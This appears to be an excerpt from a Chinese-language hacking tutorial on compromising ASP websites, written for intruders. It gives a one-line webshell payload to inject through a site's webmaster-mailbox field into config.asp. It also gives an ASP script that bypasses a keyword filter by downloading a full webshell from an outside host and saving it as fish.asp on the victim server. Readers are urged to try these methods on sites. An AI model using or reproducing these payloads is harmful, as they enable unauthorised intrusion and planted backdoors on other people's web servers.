几个用过入侵技巧整理(图)

     其实不光是MY动力管理系统，动易文章系统以前也存在这个问题：在站长信箱那里写入"%><%eva(request("xiaozhi"))%><%' 然后直接连接inc目录下的config.asp就可以了。因为很多网站信息都是写入在config.asp里的，有空各位朋友可以自己去测试一下（编辑：如果读者朋友懂ASP可以自己研究一些ASP程序是否在后台配置文件用到FSO，这样基本上就是把配置信息写到了ASP文件里了）。

　　三、突破一流信息监控系统实现文件“上传”

　　相信很多朋友可能遇到过这样一个问题：在得到一个小马以后传大马的时候服务器却提示错误：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容!本次拦截的相关信息为：98424b88afb8，如图7。 

    本来以为换个大马就可以了，但是我换了N个马都是不行。我想可能是禁止提交了，但是随便提交几个字都是OK的，原来是因为它设置了限制提交字符，只要我们的大马里包含特殊字符就会被拒绝提交，不过我们还是有办法突破他的。

　　这个就好比我们上传EXE文件的时候，网站禁止了上传，但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中。比如VBS?嘿嘿 好了，这个方法就是，只要服务器没有禁用XML和数据流组件，我们可以往服务器中提交以下ASP脚本文件，代码如下：

★ <% Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",http://www.hack521.cn/fish.txt,False xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath("fish.asp"),2 set sGet = nothing set sPOST = nothing %> ★

　　利用服务器的XML和数据流组件，从我的blog的fish.txt的内容下载到目标站点根目录并保存为fish.asp。fish.txt中的内容当然就是被拦截的内容了，也就是我们的大马。之后访问这个提交的ASP文件，会出现一片空白，然后我们再访问这个fish.asp文件，则想要上传的内容已经被保存成功!如图8。

　　图8 

　　怎么样?亲爱的读者?你学会了没有?是不是脑子里又多了一条新思路?这期我主要以三个实例来讲解一下一些大家都知道但是都不常用的方法。很多朋友问过我，为什么我写的文章里所用的方法家都知道，为什么就想不到呢?还是那句话，思路要清晰，渗透是一个细致活，不急不躁方能心平。